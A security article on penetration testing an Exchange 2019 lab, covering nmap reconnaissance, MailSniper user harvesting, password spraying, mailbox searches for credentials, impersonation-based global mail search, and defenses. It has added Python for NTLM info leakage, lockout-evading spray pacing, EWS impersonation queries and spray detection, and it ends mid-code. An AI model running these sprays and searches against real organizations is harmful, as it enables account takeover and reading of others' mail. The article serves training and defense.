Red Hot Cyber
Microsoft Exchange Server Penetration Testing: Techniques, Tools, and Countermeasures

Alessandro Molinari : 6 November 2025 07:03

Often, during a penetration test, we end up with elevated access (Domain Admin) inside the organization. Some companies stop there, treating Domain Admin as the final goal.

It is not. "We got Domain Admin" means little to most executives; what makes the risk tangible is showing what that access reaches. One of the most effective ways to do that is to demonstrate access to sensitive data, and the mailboxes on the Exchange server are an obvious place to find it.

Here we describe penetration testing of Exchange 2019 in a GOADv3 lab configured on Ludus/Debian.


(Image: the target Exchange server)

Tools Used

The primary toolkit is MailSniper, a PowerShell suite for enumerating and abusing Exchange mailboxes through Exchange Web Services (EWS), Outlook Web Access (OWA) and Exchange ActiveSync (EAS): domain and username harvesting, password spraying, and searching mailboxes for credentials and other sensitive data.

I also used NetExec from a Kali machine, but MailSniper gave problems on PowerShell for Linux, so I had to rely on a Windows 11 Pro host:

(Image: MailSniper failing to run on Kali)
(Image: the NetExec scan of the entire environment)

Phase 1: Exchange Server Reconnaissance and Identification

Before any attack, the Exchange server has to be located precisely.

  • Start with OSINT: DNS MX records, public OWA URLs, Autodiscover (autodiscover.<domain>), the subject names in TLS certificates, and metadata visible in job posts or public documents.
  • Then run targeted Nmap scans against the standard services:
nmap -p25,80,443,445,587,993,995 -sV -oA exchange_scan 10.3.10.21

This covers SMTP (25/587), the HTTPS front end that serves OWA and EWS, SMB, and the secure mail protocols on 993/995 (IMAPS/POP3S, which are off by default in Exchange 2019 and do not show up here). The output below was produced with -A -T4 -Pn instead, which adds OS detection and the default scripts: ssl-cert, smtp-commands and the *-ntlm-info scripts are what give away the internal hostname (the-eyrie.sevenkingdoms.local), the NetBIOS domain (SEVENKINGDOMS) and the OS build (10.0.17763, Windows Server 2019). Ports 81 and 444 are the Exchange Back End IIS site, 5985/5986 is WinRM and 3389 is RDP; the last two become the lateral-movement paths later on.

 # Nmap 7.95 scan initiated Wed Oct 15 12:52:25 2025 as: /usr/lib/nmap/nmap --privileged -A -T 4 -Pn -oA /mnt/hgfs/VMsharedDownloads/Exchange2019InitialScan 10.3.10.21
Nmap scan report for 10.3.10.21
Host is up (0.0027s latency).
Not shown: 975 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, SMTPUTF8, XRDST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
81/tcp open http Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/https
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| http-title: Outlook
|_Requested resource was https://10.3.10.21/owa/auth/logon.aspx?url=https%3a%2f%2f10.3.10.21%2fowa%2f&reason=0
444/tcp open snpp?
445/tcp open microsoft-ds?
465/tcp open smtp Microsoft Exchange smtpd
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info: 
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: THE-EYRIE
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: the-eyrie.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
|_ Product_Version: 10.0.17763
587/tcp open smtp Microsoft Exchange smtpd
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
808/tcp open ccproxy-http?
1801/tcp open msmq?
2103/tcp open zephyr-clt?
2105/tcp open eklogin?
2107/tcp open msmq-mgmt?
2525/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
3389/tcp open ms-wbt-server?
| rdp-ntlm-info: 
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: THE-EYRIE
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: the-eyrie.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-15T16:52:55+00:00
| ssl-cert: Subject: commonName=the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-07T10:19:37
|_Not valid after: 2026-04-08T10:19:37
3800/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
3801/tcp open mc-nmf .NET Message Framing
3828/tcp open mc-nmf .NET Message Framing
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
5986/tcp open wsmans?
| ssl-cert: Subject: commonName=WIN2019-SRV-X64
| Subject Alternative Name: DNS:WIN2019-SRV-X64, DNS:WIN2019-SRV-X64
| Not valid before: 2025-09-19T18:32:07
|_Not valid after: 2035-09-17T18:32:07
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6789/tcp open ibm-db2-admin?
Device type: general purpose
Running: Microsoft Windows 2019
CPE OS: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019
Network Distance: 3 hops
Service Info: Host: the-eyrie.sevenkingdoms.local; OS: Windows; CPE: cpe:/o:microsoft:windows
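The Target_Name, NetBIOS and DNS names and Product_Version printed by smtp-ntlm-info and rdp-ntlm-info above come from the AV_PAIRs and Version field of the NTLM CHALLENGE_MESSAGE (Type 2) that the server returns when offered a NEGOTIATE_MESSAGE (Type 1). The script failed on 25/tcp and 587/tcp in this scan, but the same data can be pulled from any NTLM-enabled HTTP endpoint Exchange exposes (/autodiscover/autodiscover.xml, /ews/exchange.asmx, /rpc/rpcproxy.dll, /mapi/...). The Python below is an added example, not code from the article or from MailSniper: it builds a Type 1 token, parses the WWW-Authenticate header into the fields nmap shows, and runs offline against a challenge constructed inline with the lab's names; the URL in the __main__ block is an assumed live usage.

```python
import base64
import ssl
import struct
import sys
import urllib.error
import urllib.request
from datetime import datetime, timedelta, timezone

# Negotiate flags used here (MS-NLMP 2.2.2.5)
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_REQUEST_TARGET = 0x00000004
NTLMSSP_NEGOTIATE_NTLM = 0x00000200
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
NTLMSSP_NEGOTIATE_TARGET_INFO = 0x00800000
NTLMSSP_NEGOTIATE_VERSION = 0x02000000

# AV_PAIR ids (MS-NLMP 2.2.2.1), named the way nmap's *-ntlm-info scripts print them
AV_IDS = {1: "NetBIOS_Computer_Name", 2: "NetBIOS_Domain_Name",
          3: "DNS_Computer_Name", 4: "DNS_Domain_Name", 5: "DNS_Tree_Name"}
AV_TIMESTAMP = 7


def negotiate_token() -> str:
    """Minimal 32-byte NEGOTIATE_MESSAGE (Type 1), base64-encoded for the Authorization header."""
    flags = (NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_REQUEST_TARGET
             | NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_ALWAYS_SIGN)
    msg = b"NTLMSSP\x00" + struct.pack("<I", 1) + struct.pack("<I", flags)
    msg += struct.pack("<HHI", 0, 0, 32) + struct.pack("<HHI", 0, 0, 32)  # empty domain/workstation
    return base64.b64encode(msg).decode()


def parse_challenge(blob: bytes) -> dict:
    """Decode a CHALLENGE_MESSAGE (Type 2) into the fields the nmap scripts report."""
    if blob[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", blob, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", blob, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", blob, 40)   # TargetInfoFields
    info = {"Target_Name": blob[tn_off:tn_off + tn_len].decode("utf-16-le")}
    if flags & NTLMSSP_NEGOTIATE_VERSION:                       # Version block at offset 48
        major, minor, build = struct.unpack_from("<BBH", blob, 48)
        info["Product_Version"] = f"{major}.{minor}.{build}"
    pos, end = ti_off, ti_off + ti_len
    while flags & NTLMSSP_NEGOTIATE_TARGET_INFO and pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        value = blob[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id == 0:                                          # MsvAvEOL
            break
        if av_id in AV_IDS:
            info[AV_IDS[av_id]] = value.decode("utf-16-le")
        elif av_id == AV_TIMESTAMP:                             # FILETIME, 100 ns ticks since 1601
            ticks = struct.unpack("<Q", value)[0]
            epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
            info["System_Time"] = (epoch + timedelta(microseconds=ticks // 10)).isoformat()
    return info


def parse_www_authenticate(header_value: str) -> dict:
    """Take the value of a 'WWW-Authenticate: NTLM <base64>' header and decode it."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM" or not token:
        raise ValueError("header does not carry an NTLM challenge")
    return parse_challenge(base64.b64decode(token))


def elicit_challenge(url: str, verify_tls: bool = False) -> dict:
    """Send a Type 1 token to an NTLM endpoint and decode the Type 2 in the 401 reply (network use only)."""
    ctx = ssl.create_default_context()
    if not verify_tls:                                          # lab servers present self-signed certs
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers={"Authorization": "NTLM " + negotiate_token()})
    try:
        urllib.request.urlopen(req, context=ctx, timeout=10)
    except urllib.error.HTTPError as err:                       # the 401 carries the challenge
        for value in err.headers.get_all("WWW-Authenticate") or []:
            if value.startswith("NTLM "):
                return parse_www_authenticate(value)
    raise RuntimeError("endpoint did not return an NTLM challenge")


def build_challenge(target: str, av_pairs: list, version=(10, 0, 17763)) -> bytes:
    """Constructed CHALLENGE_MESSAGE mimicking the lab server: sample data for offline use."""
    tname = target.encode("utf-16-le")
    tinfo = b"".join(struct.pack("<HH", i, len(v.encode("utf-16-le"))) + v.encode("utf-16-le")
                     for i, v in av_pairs) + struct.pack("<HH", 0, 0)
    flags = NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_TARGET_INFO | NTLMSSP_NEGOTIATE_VERSION
    msg = b"NTLMSSP\x00" + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(tname), len(tname), 56)            # TargetNameFields
    msg += struct.pack("<I", flags) + b"\x11" * 8 + b"\x00" * 8        # flags, challenge, reserved
    msg += struct.pack("<HHI", len(tinfo), len(tinfo), 56 + len(tname))  # TargetInfoFields
    msg += struct.pack("<BBH", *version) + b"\x00\x00\x00\x0f"         # Version
    return msg + tname + tinfo


# Constructed sample: what the-eyrie would return, matching the nmap output above
SAMPLE_HEADER = "NTLM " + base64.b64encode(build_challenge("SEVENKINGDOMS", [
    (2, "SEVENKINGDOMS"), (1, "THE-EYRIE"), (4, "sevenkingdoms.local"),
    (3, "the-eyrie.sevenkingdoms.local"), (5, "sevenkingdoms.local")])).decode()

if __name__ == "__main__":
    # Assumed live usage: python ntlm_info.py https://10.3.10.21/autodiscover/autodiscover.xml
    result = elicit_challenge(sys.argv[1]) if len(sys.argv) > 1 else parse_www_authenticate(SAMPLE_HEADER)
    for key, value in result.items():
        print(f"{key}: {value}")
```

The Type 1 token here deliberately leaves domain and workstation empty and asks for the target name, so the server answers with its full TargetInfo; the same request against an internet-facing OWA leaks the internal AD domain and hostname before a single credential is tried, which is why Autodiscover and EWS are usually placed behind a pre-authenticating proxy.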

Phase 2: Mail User and Endpoint Enumeration

(Image: output of Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21, which returns the internal domain name)

After locating the server, we collect valid usernames, the prerequisite for password spraying or brute force.

MailSniper works at three levels here. Invoke-DomainHarvestOWA determines the internal domain name (needed for the DOMAIN\user logon format) from the OWA endpoint; Invoke-UsernameHarvestOWA validates candidate names from a wordlist by comparing the OWA logon response time for valid and invalid users; Get-GlobalAddressList needs one set of valid credentials (usually given as DOMAIN\user) and dumps the Global Address List (GAL):

Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21 -OutFile userlist.txt
Invoke-UsernameHarvestOWA -UserList .\users.txt -ExchHostname 10.3.10.21 -Domain SEVENKINGDOMS -OutFile AccountsTrovati.txt
Get-GlobalAddressList -ExchHostname 10.3.10.21 -UserName "domainuser" -Password "Password!" -OutFile gal.txt

A solid user list lets you run targeted attacks with realistic, context-based passwords (Game of Thrones themed in this lab; in a real engagement, whatever OSINT on the company, the season and local naming habits suggests).

Note that MailSniper does not discover users out of thin air: Invoke-UsernameHarvestOWA only confirms names you already guessed, and Get-GlobalAddressList returns exactly the list Exchange exposes to any authenticated user, the same GAL a logged-in user sees in OWA.

Phase 3: Password Spraying and Initial Login

With realistic passwords built from public and contextual information, the spray is run with MailSniper against OWA, EWS or ActiveSync (Invoke-PasswordSprayOWA, Invoke-PasswordSprayEWS, Invoke-PasswordSprayEAS), one password against the whole user list per round, so that no single account accumulates enough failures to reach the lockout threshold:

Invoke-PasswordSprayOWA -ExchHostname 10.3.10.21 -UserList userlist.txt -Password "ilovejaime" -OutFile spray_results.txt


The credentials are correct:

(Image: spray output with the valid login)
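The GOAD lab may not enforce a lockout policy, but a production domain does, and MailSniper's spray cmdlets do not pace themselves: they run the list as fast as -Threads allows. Before spraying, read the policy (net accounts /domain, or Get-ADDefaultDomainPasswordPolicy) and keep each user below "Account lockout threshold" attempts per "Reset account lockout counter after" window. The Python below is an added example, not from the article or from MailSniper: a toy model of the DC's bad-password counter, with the lab's user names and constructed passwords, run once with a careless spray and once with a paced one, so the lockout failure mode is visible without touching a real directory.

```python
from dataclasses import dataclass, field


@dataclass
class LockoutPolicy:
    """The two AD settings that matter for spraying (values assumed for the example)."""
    threshold: int = 5              # Account lockout threshold (0 = never lock)
    observation_minutes: int = 30   # Reset account lockout counter after


@dataclass
class SimulatedDirectory:
    """Toy stand-in for the DC behind OWA: counts bad passwords per user like badPwdCount."""
    creds: dict                     # user -> real password (constructed sample data)
    policy: LockoutPolicy
    bad_count: dict = field(default_factory=dict)
    last_bad: dict = field(default_factory=dict)
    locked: set = field(default_factory=set)

    def authenticate(self, user: str, password: str, now: float) -> bool:
        """now is virtual time in minutes; a locked account fails even with the right password."""
        if user not in self.creds or user in self.locked:
            return False
        if now - self.last_bad.get(user, -1e9) >= self.policy.observation_minutes:
            self.bad_count[user] = 0            # counter reset after the observation window
        if self.creds[user] == password:
            self.bad_count[user] = 0
            return True
        self.bad_count[user] = self.bad_count.get(user, 0) + 1
        self.last_bad[user] = now
        if self.policy.threshold and self.bad_count[user] >= self.policy.threshold:
            self.locked.add(user)
        return False


REQUEST_COST = 0.01  # virtual minutes per authentication request


def naive_spray(directory, users, passwords):
    """One password per round across all users with no pauses: this is how a spray locks out a domain."""
    found, now = {}, 0.0
    for pw in passwords:
        for user in users:
            if user in found:
                continue
            now += REQUEST_COST
            if directory.authenticate(user, pw, now):
                found[user] = pw
    return found


def paced_spray(directory, users, passwords, margin=2):
    """Use at most (threshold - margin) attempts per user per observation window, then wait for the reset.
    margin leaves room for the users' own typos so the spray never pushes anyone over the threshold."""
    policy = directory.policy
    per_window = max(1, policy.threshold - margin) if policy.threshold else None
    found, now = {}, 0.0
    for i, pw in enumerate(passwords):
        if per_window and i and i % per_window == 0:
            now += policy.observation_minutes + 1   # sleep past the counter reset
        for user in users:
            if user in found:
                continue
            now += REQUEST_COST
            if directory.authenticate(user, pw, now):
                found[user] = pw
    return found, now


# Constructed lab data; the passwords are illustrative, not from the article
USERS = ["jon.snow", "cersei.lannister", "tyrion.lannister", "jaime.lannister", "sansa.stark"]
CREDS = {"jon.snow": "Winter2025!", "cersei.lannister": "ilovejaime", "tyrion.lannister": "Xk9#pL2vQ!m",
         "jaime.lannister": "R7!tWq2zB#n", "sansa.stark": "Lemon-Cakes-4"}
CANDIDATES = ["Summer2025!", "ilovejaime", "Winterfell1", "Password1", "Dragon123",
              "Westeros!", "Winter2025!", "KingsLanding1"]


def compare(policy=LockoutPolicy()):
    """Run both strategies against fresh directories and report hits, lockouts and elapsed virtual time."""
    naive_dir = SimulatedDirectory(dict(CREDS), policy)
    paced_dir = SimulatedDirectory(dict(CREDS), policy)
    naive_hits = naive_spray(naive_dir, USERS, CANDIDATES)
    paced_hits, elapsed = paced_spray(paced_dir, USERS, CANDIDATES)
    return {"naive_hits": naive_hits, "naive_locked": sorted(naive_dir.locked),
            "paced_hits": paced_hits, "paced_locked": sorted(paced_dir.locked),
            "paced_minutes": round(elapsed, 2)}


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value}")
```

With the default policy the naive run finds only the password tried in round two and locks out the other four accounts before it ever reaches the right one for jon.snow; the paced run finds both at the cost of roughly an hour of waiting. That waiting time is the real budget of a spray, and it is also why the observation window, not only the threshold, belongs in the defender's lockout policy.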

Phase 4: Post-Exploitation and Search for Sensitive Information

With MailSniper, from a compromised account, you can:

  • Search the mailbox for credentials or other sensitive information (Invoke-SelfSearch works over EWS; with -Remote it prompts for the credentials when you are not running as that user):
 Invoke-SelfSearch -Mailbox [email protected] -Terms "password","vpn","confidential"
  • List attachments and download them for offline analysis:
 Invoke-SelfSearch -Mailbox [email protected] -CheckAttachments -DownloadDir C:\loot
  • With an Exchange administrative account, extend the search to every mailbox in the organization. Invoke-GlobalMailSearch connects to the Exchange PowerShell endpoint, grants the ApplicationImpersonation role to the account given in -ImpersonationAccount, and then searches all mailboxes over EWS:
 Invoke-GlobalMailSearch -ImpersonationAccount "domainadmin" -ExchHostname 10.3.10.21 -Terms "password","confidential" -OutputCsv all_mail_search.csv
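Under the hood all three cmdlets send the same EWS SOAP operation, FindItem, with an AQS query string; the only difference between "my mailbox" and "everyone's mailbox" is an ExchangeImpersonation header naming the target, which the server honours only if the caller holds ApplicationImpersonation. Seeing the raw exchange makes both the attack and the defensive control concrete. The Python below is an added example, not MailSniper's code: it builds the request, parses a FindItemResponse, and treats ErrorImpersonateUserDenied as the signal that the role is missing; the two responses are constructed for offline use, and post_ews (Basic auth over HTTPS, an assumption that only holds where Basic is enabled on EWS) is the assumed live path.

```python
import base64
import ssl
import urllib.request
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
T = "http://schemas.microsoft.com/exchange/services/2006/types"
M = "http://schemas.microsoft.com/exchange/services/2006/messages"
NS = {"s": SOAP, "t": T, "m": M}
for prefix, uri in (("soap", SOAP), ("t", T), ("m", M)):
    ET.register_namespace(prefix, uri)


def find_item_request(terms, impersonate=None, folder="inbox", max_entries=50) -> bytes:
    """FindItem with an AQS query over one folder, optionally impersonating another mailbox."""
    env = ET.Element(f"{{{SOAP}}}Envelope")
    header = ET.SubElement(env, f"{{{SOAP}}}Header")
    ET.SubElement(header, f"{{{T}}}RequestServerVersion", Version="Exchange2016")
    if impersonate:                       # this header is the whole "global search" trick
        imp = ET.SubElement(header, f"{{{T}}}ExchangeImpersonation")
        sid = ET.SubElement(imp, f"{{{T}}}ConnectingSID")
        ET.SubElement(sid, f"{{{T}}}PrimarySmtpAddress").text = impersonate
    body = ET.SubElement(env, f"{{{SOAP}}}Body")
    find = ET.SubElement(body, f"{{{M}}}FindItem", Traversal="Shallow")
    shape = ET.SubElement(find, f"{{{M}}}ItemShape")
    ET.SubElement(shape, f"{{{T}}}BaseShape").text = "IdOnly"
    props = ET.SubElement(shape, f"{{{T}}}AdditionalProperties")
    for uri in ("item:Subject", "item:DateTimeReceived", "message:From"):
        ET.SubElement(props, f"{{{T}}}FieldURI", FieldURI=uri)
    ET.SubElement(find, f"{{{M}}}IndexedPageItemView",
                  MaxEntriesReturned=str(max_entries), Offset="0", BasePoint="Beginning")
    parents = ET.SubElement(find, f"{{{M}}}ParentFolderIds")
    ET.SubElement(parents, f"{{{T}}}DistinguishedFolderId", Id=folder)
    # AQS: quote each term so multi-word terms stay intact; schema order puts QueryString last
    ET.SubElement(find, f"{{{M}}}QueryString").text = " OR ".join(f'"{t}"' for t in terms)
    return ET.tostring(env, xml_declaration=True, encoding="utf-8")


def parse_find_item_response(xml_bytes: bytes) -> list:
    """Return [{subject, from, received}] from a FindItemResponse; raise on a non-success ResponseCode."""
    root = ET.fromstring(xml_bytes)
    msg = root.find(".//m:FindItemResponseMessage", NS)
    if msg is None:
        raise ValueError("no FindItemResponseMessage in reply")
    code = msg.findtext("m:ResponseCode", namespaces=NS)
    if code != "NoError":                 # e.g. ErrorImpersonateUserDenied: no ApplicationImpersonation role
        raise PermissionError(code)
    return [{"subject": item.findtext("t:Subject", namespaces=NS),
             "from": item.findtext("t:From/t:Mailbox/t:EmailAddress", namespaces=NS),
             "received": item.findtext("t:DateTimeReceived", namespaces=NS)}
            for item in msg.findall(".//t:Items/*", NS)]


def post_ews(url, username, password, body, verify_tls=False):
    """POST the SOAP body with HTTP Basic auth (network use only; NTLM needs a third-party library)."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(url, data=body, method="POST", headers={
        "Content-Type": "text/xml; charset=utf-8", "Authorization": "Basic " + token})
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        return parse_find_item_response(resp.read())


# Constructed responses: one successful search, one impersonation refused by the server
SAMPLE_RESPONSE = f"""<s:Envelope xmlns:s="{SOAP}"><s:Body><m:FindItemResponse xmlns:m="{M}" xmlns:t="{T}">
<m:ResponseMessages><m:FindItemResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode>
<m:RootFolder TotalItemsInView="2" IncludesLastItemInRange="true"><t:Items>
<t:Message><t:ItemId Id="AAMk1" ChangeKey="CQAAAB"/><t:Subject>VPN credentials for the new site</t:Subject>
<t:From><t:Mailbox><t:EmailAddress>itops@sevenkingdoms.local</t:EmailAddress></t:Mailbox></t:From>
<t:DateTimeReceived>2025-10-14T09:12:00Z</t:DateTimeReceived></t:Message>
<t:Message><t:ItemId Id="AAMk2" ChangeKey="CQAAAC"/><t:Subject>RE: password reset</t:Subject>
<t:From><t:Mailbox><t:EmailAddress>helpdesk@sevenkingdoms.local</t:EmailAddress></t:Mailbox></t:From>
<t:DateTimeReceived>2025-10-13T16:40:00Z</t:DateTimeReceived></t:Message>
</t:Items></m:RootFolder></m:FindItemResponseMessage></m:ResponseMessages></m:FindItemResponse></s:Body></s:Envelope>""".encode()

DENIED_RESPONSE = f"""<s:Envelope xmlns:s="{SOAP}"><s:Body><m:FindItemResponse xmlns:m="{M}"><m:ResponseMessages>
<m:FindItemResponseMessage ResponseClass="Error"><m:MessageText>The account does not have permission to impersonate the requested user.</m:MessageText>
<m:ResponseCode>ErrorImpersonateUserDenied</m:ResponseCode></m:FindItemResponseMessage>
</m:ResponseMessages></m:FindItemResponse></s:Body></s:Envelope>""".encode()

if __name__ == "__main__":
    print(find_item_request(["password", "vpn"], impersonate="jon.snow@sevenkingdoms.local").decode())
    for hit in parse_find_item_response(SAMPLE_RESPONSE):
        print(hit)
```

Assumed live usage is post_ews("https://10.3.10.21/ews/exchange.asmx", "SEVENKINGDOMS\\cersei.lannister", "ilovejaime", find_item_request(["password"])). ErrorImpersonateUserDenied is the normal answer for an ordinary user; Invoke-GlobalMailSearch gets past it only because it first grants ApplicationImpersonation through the Exchange PowerShell endpoint, which is why that role assignment is worth alerting on.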

Phase 5: Lateral Movement and Privilege Escalation

Mailbox access lets you hunt for privileged credentials (a Domain Admin's, for example), which routinely turn up in attachments, password-reset messages and IT handover threads.

With those credentials you can:

  • Access internal systems via RDP (3389) or PowerShell remoting (5985/5986), both open on the-eyrie in the scan above.
  • Kerberoast: request service tickets for accounts that have an SPN and crack the TGS hashes offline. Exchange's own SPNs are bound to the computer account, so the server itself is a poor target, but the credentials found in mail often belong to service accounts that are.
  • Abuse Exchange delegation and mailbox permissions (Full Access, Send-As, Send on Behalf) to read other people's mail and to send as trusted colleagues, the most credible internal phishing there is.

MailSniper has no cmdlet that audits permissions directly, but Invoke-OpenInboxFinder checks which mailboxes in a list the current account can open, which is the attacker's view of those permissions:

 Invoke-OpenInboxFinder -EmailList gal.txt -ExchHostname 10.3.10.21 -Remote

The defender's view of the same data comes from Get-MailboxPermission and Get-ADPermission (for Send-As) in the Exchange Management Shell.

Recommended Defenses Against Exchange Attacks

To mitigate the risks shown above:

  • Restrict mailbox and delegation permissions: only the roles that strictly need it should hold ApplicationImpersonation, Full Access or Send-As, and the assignments should be reviewed periodically. An Exchange admin who can grant himself impersonation is, in practice, a reader of every mailbox.
  • Monitor Exchange activity: log and review authentication, EWS and ActiveSync usage (the IIS logs and the protocol logs under %ExchangeInstallPath%Logging\HttpProxy), and alert when one client address fails logons for many different users.
  • Patch promptly: known vulnerabilities such as ProxyLogon and ProxyShell were mass-exploited soon after disclosure; keep the server on a supported Cumulative Update and apply security updates as they are released.
  • Multi-factor authentication on OWA, EAS and EWS, together with blocking Basic authentication per protocol through Exchange authentication policies; otherwise a spray over EAS or EWS with Basic auth simply bypasses the MFA on the OWA form. Restrict remote PowerShell to administrative hosts.
  • Network segmentation: isolate the Exchange servers, expose only the client protocols actually needed from the DMZ, and keep RDP, WinRM and the back-end ports (81/444) reachable from management networks only.
  • Password spray controls and lockouts: a sensible lockout policy (with stricter fine-grained policies for privileged accounts), banned-password lists, and detection of many distinct users failing from a single source.

(Image: Network diagram with segmentation and access control)
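The monitoring and spray-control points above come down to one detection: a single client address failing authentication for many different users inside a short window. The Python below is an added example, not part of the article: it reads IIS W3C log lines from the Exchange front end (the default Exchange 2019 field set is assumed), counts 401 responses per client, and recovers the attempted username where the log has it, which for ActiveSync is the User= query parameter and for other protocols only cs-username once a logon succeeds (OWA forms-based logons post the name in the request body, so the IIS log cannot attribute those). The log lines are constructed and mirror the spray shown earlier.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Front-end paths where a failed logon appears as a 401 in the IIS log
AUTH_PATHS = ("/microsoft-server-activesync", "/ews/", "/autodiscover/", "/mapi/", "/rpc/", "/oab/")


def parse_w3c(lines):
    """Yield dict rows from IIS W3C log text, taking column names from the #Fields header."""
    fields = None
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def attempted_user(row):
    """Who tried to log on: EAS carries it in the query string; cs-username is filled only once authenticated."""
    if row["cs-username"] != "-":
        return row["cs-username"].lower()
    if row["cs-uri-stem"].lower().startswith("/microsoft-server-activesync"):
        users = parse_qs(row["cs-uri-query"]).get("User")
        if users:
            return users[0].lower()
    return None


def detect_spray(lines, window=timedelta(minutes=5), min_users=5, min_failures=20):
    """Flag client IPs that fail for many distinct users (or simply very often) inside one window."""
    failures = defaultdict(list)                      # c-ip -> [(timestamp, user or None)]
    for row in parse_w3c(lines):
        if row["sc-status"] != "401" or not row["cs-uri-stem"].lower().startswith(AUTH_PATHS):
            continue
        ts = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        failures[row["c-ip"]].append((ts, attempted_user(row)))
    alerts = []
    for ip, events in failures.items():
        events.sort(key=lambda e: e[0])
        for start in range(len(events)):              # sliding window anchored at each failure
            t0 = events[start][0]
            in_window = [e for e in events[start:] if e[0] - t0 <= window]
            users = {u for _, u in in_window if u}
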